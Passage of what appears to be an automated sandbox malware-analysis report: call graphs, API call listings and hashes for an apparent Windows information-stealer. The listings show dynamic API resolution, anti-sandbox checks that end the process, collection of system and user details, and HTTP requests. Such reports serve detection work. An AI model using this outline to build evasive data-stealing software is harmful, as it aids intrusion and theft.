27257->27258 27259 704fe4 27257->27259 27258->27259 27260 70500d 27259->27260 27261 705005 lstrcpy 27259->27261 27262 705014 lstrlen 27260->27262 27261->27260 27263 70502a 27262->27263 27264 70504d 27263->27264 27265 705036 lstrcpy lstrcat 27263->27265 27266 705071 lstrcpy 27264->27266 27267 705079 27264->27267 27265->27264 27266->27267 27268 705080 lstrlen 27267->27268 27269 70509b 27268->27269 27270 7050ac lstrcpy lstrcat 27269->27270 27271 7050bc 27269->27271 
27270->27271 27272 7050da lstrcpy lstrcat 27271->27272 27273 7050ed 27271->27273 27272->27273 27274 70510b lstrcpy 27273->27274 27275 705113 27273->27275 27274->27275 27276 705121 InternetConnectA 27275->27276 27276->27220 27277 705150 HttpOpenRequestA 27276->27277 27278 7054b1 InternetCloseHandle 27277->27278 27279 70518b 27277->27279 27278->27220 27432 727310 lstrlen 27279->27432 27283 7051a4 27440 7272c0 27283->27440 27286 727280 lstrcpy 27287 7051c0 27286->27287 27288 727310 3 API calls 27287->27288 27289 7051d5 27288->27289 27290 727280 lstrcpy 27289->27290 27291 7051de 27290->27291 27292 727310 3 API calls 27291->27292 27293 7051f4 27292->27293 27294 727280 lstrcpy 27293->27294 27295 7051fd 27294->27295 27296 727310 3 API calls 27295->27296 27297 705213 27296->27297 27298 727280 lstrcpy 27297->27298 27299 70521c 27298->27299 27300 727310 3 API calls 27299->27300 27301 705231 27300->27301 27302 727280 lstrcpy 27301->27302 27303 70523a 27302->27303 27304 7272c0 2 API calls 27303->27304 27305 70524d 27304->27305 27306 727280 lstrcpy 27305->27306 27307 705256 27306->27307 27308 727310 3 API calls 27307->27308 27309 70526b 27308->27309 27310 727280 lstrcpy 27309->27310 27311 705274 27310->27311 27312 727310 3 API calls 27311->27312 27313 705289 27312->27313 27314 727280 lstrcpy 27313->27314 27315 705292 27314->27315 27316 7272c0 2 API calls 27315->27316 27317 7052a5 27316->27317 27318 727280 lstrcpy 27317->27318 27319 7052ae 27318->27319 27320 727310 3 API calls 27319->27320 27321 7052c3 27320->27321 27322 727280 lstrcpy 27321->27322 27323 7052cc 27322->27323 27324 727310 3 API calls 27323->27324 27325 7052e2 27324->27325 27326 727280 lstrcpy 27325->27326 27327 7052eb 27326->27327 27328 727310 3 API calls 27327->27328 27329 705301 27328->27329 27330 727280 lstrcpy 27329->27330 27331 70530a 27330->27331 27332 727310 3 API calls 27331->27332 27333 70531f 27332->27333 27334 727280 lstrcpy 27333->27334 27335 705328 27334->27335 27336 7272c0 2 API calls 27335->27336 
27337 70533b 27336->27337 27338 727280 lstrcpy 27337->27338 27339 705344 27338->27339 27340 705370 lstrcpy 27339->27340 27341 70537c 27339->27341 27340->27341 27342 7272c0 2 API calls 27341->27342 27343 70538a 27342->27343 27344 7272c0 2 API calls 27343->27344 27345 705397 27344->27345 27346 727280 lstrcpy 27345->27346 27347 7053a1 27346->27347 27348 7053b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27347->27348 27349 70549c InternetCloseHandle 27348->27349 27353 7053f2 27348->27353 27351 7054ae 27349->27351 27350 7053fd lstrlen 27350->27353 27351->27278 27352 70542e lstrcpy lstrcat 27352->27353 27353->27349 27353->27350 27353->27352 27354 705473 27353->27354 27355 70546b lstrcpy 27353->27355 27356 70547a InternetReadFile 27354->27356 27355->27354 27356->27349 27356->27353 27358 718cc6 ExitProcess 27357->27358 27359 718ccd 27357->27359 27360 718ee2 27359->27360 27361 718d30 lstrlen 27359->27361 27362 718e56 StrCmpCA 27359->27362 27363 718d5a lstrlen 27359->27363 27364 718dbd StrCmpCA 27359->27364 27365 718ddd StrCmpCA 27359->27365 27366 718dfd StrCmpCA 27359->27366 27367 718e1d StrCmpCA 27359->27367 27368 718e3d StrCmpCA 27359->27368 27369 718d84 StrCmpCA 27359->27369 27370 718da4 StrCmpCA 27359->27370 27371 718d06 lstrlen 27359->27371 27372 718e88 lstrlen 27359->27372 27373 718e6f StrCmpCA 27359->27373 27374 718ebb lstrcpy 27359->27374 27360->26248 27361->27359 27362->27359 27363->27359 27364->27359 27365->27359 27366->27359 27367->27359 27368->27359 27369->27359 27370->27359 27371->27359 27372->27359 27373->27359 27374->27359 27375->26254 27376->26256 27377->26262 27378->26264 27379->26270 27380->26272 27381->26278 27382->26282 27383->26288 27384->26290 27385->26294 27386->26308 27387->26312 27388->26311 27389->26307 27390->26311 27391->26327 27392->26314 27393->26315 27394->26320 27395->26323 27396->26329 27397->26331 27398->26338 27399->26344 27400->26365 27401->26369 27402->26368 27403->26364 27404->26368 27405->26378 27408 70161f 27407->27408 27409 
70162b lstrcpy 27408->27409 27410 701633 27408->27410 27409->27410 27411 70164d lstrcpy 27410->27411 27412 701655 27410->27412 27411->27412 27413 70166f lstrcpy 27412->27413 27414 701677 27412->27414 27413->27414 27415 701699 27414->27415 27416 701691 lstrcpy 27414->27416 27415->27100 27416->27415 27418 7271e6 27417->27418 27419 722860 27418->27419 27420 7271fc lstrcpy 27418->27420 27419->26243 27420->27419 27422 704bd0 27421->27422 27422->27422 27423 704bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27422->27423 27424 704c41 27423->27424 27424->27208 27426 723e83 27425->27426 27427 723e9f lstrcpy 27426->27427 27428 723eab 27426->27428 27427->27428 27429 723ed5 GetSystemTime 27428->27429 27430 723ecd lstrcpy 27428->27430 27431 723ef3 27429->27431 27430->27429 27431->27227 27434 72732d 27432->27434 27433 70519b 27436 727280 27433->27436 27434->27433 27435 72733d lstrcpy lstrcat 27434->27435 27435->27433 27437 72728c 27436->27437 27438 7272b4 27437->27438 27439 7272ac lstrcpy 27437->27439 27438->27283 27439->27438 27442 7272dc 27440->27442 27441 7051b7 27441->27286 27442->27441 27443 7272ed lstrcpy lstrcat 27442->27443 27443->27441 27474 7231f0 GetSystemInfo wsprintfA 27445 728471 122 API calls 2 library calls 27446 714c77 296 API calls 27457 71e0f9 140 API calls 27486 716b79 138 API calls 27448 708c79 malloc 27482 71f2f8 93 API calls 27487 701b64 162 API calls 27501 70bbf9 90 API calls 27468 722d60 11 API calls 27488 722b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27489 72a280 __CxxFrameHandler 27477 711269 408 API calls 27449 705869 57 API calls 27450 722853 lstrcpy 27458 722cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27470 713959 244 API calls 27475 7101d9 126 API calls 27459 723cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27502 7233c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27491 718615 49 API calls 27452 71e049 147 API calls 27503 718615 48 API calls 27472 723130 GetProcessHeap RtlAllocateHeap 
RegOpenKeyExA RegQueryValueExA RegCloseKey 27504 71abb2 120 API calls 27478 70f639 144 API calls 27483 7016b9 200 API calls 27494 70bf39 177 API calls 27479 708e20 malloc free std::exception::exception 27460 7230a0 GetSystemPowerStatus 27476 7229a0 GetCurrentProcess IsWow64Process 27495 714b29 304 API calls 27505 7123a9 298 API calls 27497 707710 free ctype 27453 701011 GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 27454 722c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27498 729711 138 API calls __setmbcp 27473 724e35 8 API calls 27461 712499 290 API calls 27506 70db99 674 API calls 27456 728819 5 API calls _raise 27507 718615 47 API calls 27462 72749e 7 API calls ctype 27464 722880 10 API calls 27465 724480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27466 723480 6 API calls 27484 723280 7 API calls 27467 718c88 16 API calls 27499 70b309 98 API calls
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00704C7F
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00704CD2
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00704D05
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00704D35
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00704D73
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00704DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00704DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: f28872c986941d927bd2efb12bede7f2206ed31e453d6dfdb9cfa83c64a15fc4
                          • Instruction ID: c3f10889a89dc86d3d289503fc0c9d1cd362fe82a574f6c698f90ddeebc9c640
                          • Opcode Fuzzy Hash: f28872c986941d927bd2efb12bede7f2206ed31e453d6dfdb9cfa83c64a15fc4
                          • Instruction Fuzzy Hash: D9525C72A15616DBDB21EBA4DC49B9E77F9AF04300F044224F905B7292DB78ED46CFA0

                          Control-flow Graph

                          APIs
                          • GetProcAddress.KERNEL32(75900000,010D0798), ref: 007263E9
                          • GetProcAddress.KERNEL32(75900000,010D0690), ref: 00726402
                          • GetProcAddress.KERNEL32(75900000,010D07E0), ref: 0072641A
                          • GetProcAddress.KERNEL32(75900000,010D0738), ref: 00726432
                          • GetProcAddress.KERNEL32(75900000,010D8A90), ref: 0072644B
                          • GetProcAddress.KERNEL32(75900000,010C62C0), ref: 00726463
                          • GetProcAddress.KERNEL32(75900000,010C65C0), ref: 0072647B
                          • GetProcAddress.KERNEL32(75900000,010D0570), ref: 00726494
                          • GetProcAddress.KERNEL32(75900000,010D0588), ref: 007264AC
                          • GetProcAddress.KERNEL32(75900000,010D05A0), ref: 007264C4
                          • GetProcAddress.KERNEL32(75900000,010D05B8), ref: 007264DD
                          • GetProcAddress.KERNEL32(75900000,010C62A0), ref: 007264F5
                          • GetProcAddress.KERNEL32(75900000,010D05E8), ref: 0072650D
                          • GetProcAddress.KERNEL32(75900000,010D0600), ref: 00726526
                          • GetProcAddress.KERNEL32(75900000,010C6380), ref: 0072653E
                          • GetProcAddress.KERNEL32(75900000,010D0630), ref: 00726556
                          • GetProcAddress.KERNEL32(75900000,010D0870), ref: 0072656F
                          • GetProcAddress.KERNEL32(75900000,010C64A0), ref: 00726587
                          • GetProcAddress.KERNEL32(75900000,010D08B8), ref: 0072659F
                          • GetProcAddress.KERNEL32(75900000,010C6320), ref: 007265B8
                          • LoadLibraryA.KERNEL32(010D0888,?,?,?,00721C03), ref: 007265C9
                          • LoadLibraryA.KERNEL32(010D0858,?,?,?,00721C03), ref: 007265DB
                          • LoadLibraryA.KERNEL32(010D08A0,?,?,?,00721C03), ref: 007265ED
                          • LoadLibraryA.KERNEL32(010D08E8,?,?,?,00721C03), ref: 007265FE
                          • LoadLibraryA.KERNEL32(010D0900,?,?,?,00721C03), ref: 00726610
                          • GetProcAddress.KERNEL32(75070000,010D08D0), ref: 0072662D
                          • GetProcAddress.KERNEL32(75FD0000,010D0918), ref: 00726649
                          • GetProcAddress.KERNEL32(75FD0000,010D8D78), ref: 00726661
                          • GetProcAddress.KERNEL32(75A50000,010D8DF0), ref: 0072667D
                          • GetProcAddress.KERNEL32(74E50000,010C6600), ref: 00726699
                          • GetProcAddress.KERNEL32(76E80000,010D8B50), ref: 007266B5
                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 007266CC
                          Strings
                          • NtQueryInformationProcess, xrefs: 007266C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 61529ce81efc82192ce4329e7c6f1c5384a18f43a9a20f4b31409011d29d7d94
                          • Instruction ID: 9f70c626fa680c86c7adc60edd8c91f8e86b25645f4269a8dc46749ad93ca8ee
                          • Opcode Fuzzy Hash: 61529ce81efc82192ce4329e7c6f1c5384a18f43a9a20f4b31409011d29d7d94
                          • Instruction Fuzzy Hash: ECA15EB9A397009FD758DF65EE88B2637B9F789644300851AF956C3360DBB4A900FF60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2141 721bf0-721c0b call 702a90 call 726390 2146 721c1a-721c27 call 702930 2141->2146 2147 721c0d 2141->2147 2151 721c35-721c63 2146->2151 2152 721c29-721c2f lstrcpy 2146->2152 2148 721c10-721c18 2147->2148 2148->2146 2148->2148 2156 721c65-721c67 ExitProcess 2151->2156 2157 721c6d-721c7b GetSystemInfo 2151->2157 2152->2151 2158 721c85-721ca0 call 701030 call 7010c0 GetUserDefaultLangID 2157->2158 2159 721c7d-721c7f ExitProcess 2157->2159 2164 721ca2-721ca9 2158->2164 2165 721cb8-721cca call 722ad0 call 723e10 2158->2165 2164->2165 2166 721cb0-721cb2 ExitProcess 2164->2166 2171 721ce7-721d06 lstrlen call 702930 2165->2171 2172 721ccc-721cde call 722a40 call 723e10 2165->2172 2178 721d23-721d40 lstrlen call 702930 2171->2178 2179 721d08-721d0d 2171->2179 2172->2171 2184 721ce0-721ce1 ExitProcess 2172->2184 2186 721d42-721d44 2178->2186 2187 721d5a-721d7b call 722ad0 lstrlen call 702930 2178->2187 2179->2178 2181 721d0f-721d11 2179->2181 2181->2178 2185 721d13-721d1d lstrcpy lstrcat 2181->2185 2185->2178 2186->2187 2188 721d46-721d54 lstrcpy lstrcat 2186->2188 2193 721d9a-721db4 lstrlen call 702930 2187->2193 2194 721d7d-721d7f 2187->2194 2188->2187 2199 721db6-721db8 2193->2199 2200 721dce-721deb call 722a40 lstrlen call 702930 2193->2200 2194->2193 2195 721d81-721d85 2194->2195 2195->2193 2197 721d87-721d94 lstrcpy lstrcat 2195->2197 2197->2193 2199->2200 2202 721dba-721dc8 lstrcpy lstrcat 2199->2202 2206 721e0a-721e0f 2200->2206 2207 721ded-721def 2200->2207 2202->2200 2209 721e11 call 702a20 2206->2209 2210 721e16-721e22 call 702930 2206->2210 2207->2206 2208 721df1-721df5 2207->2208 2208->2206 2211 721df7-721e04 lstrcpy lstrcat 2208->2211 2209->2210 2215 721e30-721e66 call 702a20 * 5 OpenEventA 2210->2215 2216 721e24-721e26 2210->2216 2211->2206 2228 721e68-721e8a CloseHandle Sleep OpenEventA 2215->2228 2229 721e8c-721ea0 CreateEventA call 721b20 call 71ffd0 2215->2229 2216->2215 2218 721e28-721e2a lstrcpy 2216->2218 2218->2215 2228->2228 2228->2229 2233 721ea5-721eae CloseHandle ExitProcess 2229->2233
                          APIs
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D0798), ref: 007263E9
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D0690), ref: 00726402
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D07E0), ref: 0072641A
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D0738), ref: 00726432
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D8A90), ref: 0072644B
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010C62C0), ref: 00726463
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010C65C0), ref: 0072647B
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D0570), ref: 00726494
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D0588), ref: 007264AC
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D05A0), ref: 007264C4
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D05B8), ref: 007264DD
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010C62A0), ref: 007264F5
                            • Part of subcall function 00726390: GetProcAddress.KERNEL32(75900000,010D05E8), ref: 0072650D
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00721C2F
                          • ExitProcess.KERNEL32 ref: 00721C67
                          • GetSystemInfo.KERNEL32(?), ref: 00721C71
                          • ExitProcess.KERNEL32 ref: 00721C7F
                            • Part of subcall function 00701030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00701046
                            • Part of subcall function 00701030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0070104D
                            • Part of subcall function 00701030: ExitProcess.KERNEL32 ref: 00701058
                            • Part of subcall function 007010C0: GlobalMemoryStatusEx.KERNEL32 ref: 007010EA
                            • Part of subcall function 007010C0: ExitProcess.KERNEL32 ref: 00701114
                          • GetUserDefaultLangID.KERNEL32 ref: 00721C8F
                          • ExitProcess.KERNEL32 ref: 00721CB2
                          • ExitProcess.KERNEL32 ref: 00721CE1
                          • lstrlen.KERNEL32(010D8A50), ref: 00721CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00721D15
                          • lstrcat.KERNEL32(00000000,010D8A50), ref: 00721D1D
                          • lstrlen.KERNEL32(00734B98), ref: 00721D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721D48
                          • lstrcat.KERNEL32(00000000,00734B98), ref: 00721D54
                          • lstrlen.KERNEL32(00000000), ref: 00721D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721D94
                          • lstrlen.KERNEL32(00734B98), ref: 00721D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721DBC
                          • lstrcat.KERNEL32(00000000,00734B98), ref: 00721DC8
                          • lstrlen.KERNEL32(00000000), ref: 00721DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: 7b2e7e3c3913a0773c0d411ec72716c1e884c39469ac6f0af2f94eaebc019086
                          • Instruction ID: 52bc0067b60418eaa0f29b4ec7d421eb790680c43df318bff8ec3fa33066489e
                          • Opcode Fuzzy Hash: 7b2e7e3c3913a0773c0d411ec72716c1e884c39469ac6f0af2f94eaebc019086
                          • Instruction Fuzzy Hash: 1B71A371A28325EBD721ABB4EC4DB6F36B9BF51701F444124F906A61A2DF78D802DF60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2850 704a60-704afc RtlAllocateHeap 2867 704b7a-704bbe VirtualProtect 2850->2867 2868 704afe-704b03 2850->2868 2869 704b06-704b78 2868->2869 2869->2867
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00704AA2
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00704BB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: 31e6e4543d4089a82d7db94d37326553c179712eb5f126298ea0aa38672bf1b5
                          • Instruction ID: 48d1d85667ca7c4d15906a619996b59cfb24f9fce981054cb191606d6d79347c
                          • Opcode Fuzzy Hash: 31e6e4543d4089a82d7db94d37326553c179712eb5f126298ea0aa38672bf1b5
                          • Instruction Fuzzy Hash: C93128A8F8822C76E628EBFF4C47F5F7E55DF85760F024096740857182C9A97481CBEA
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00722A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00722A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00722A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 30e7764b7ff8397893527d5c605920b006796d801b07b9f8dfd5ee3f8112ca8e
                          • Instruction ID: 8e22b14835f56a1ff9580317ae86dcfe3e1c3abd367a2067e99222d8c94d12ff
                          • Opcode Fuzzy Hash: 30e7764b7ff8397893527d5c605920b006796d801b07b9f8dfd5ee3f8112ca8e
                          • Instruction Fuzzy Hash: BEF054B1A48654ABD710DF98DD49B9EBBBCF749B21F100216F915E3680D7B419048AE1

                          Control-flow Graph

                          • Executed
                          • Not Executed
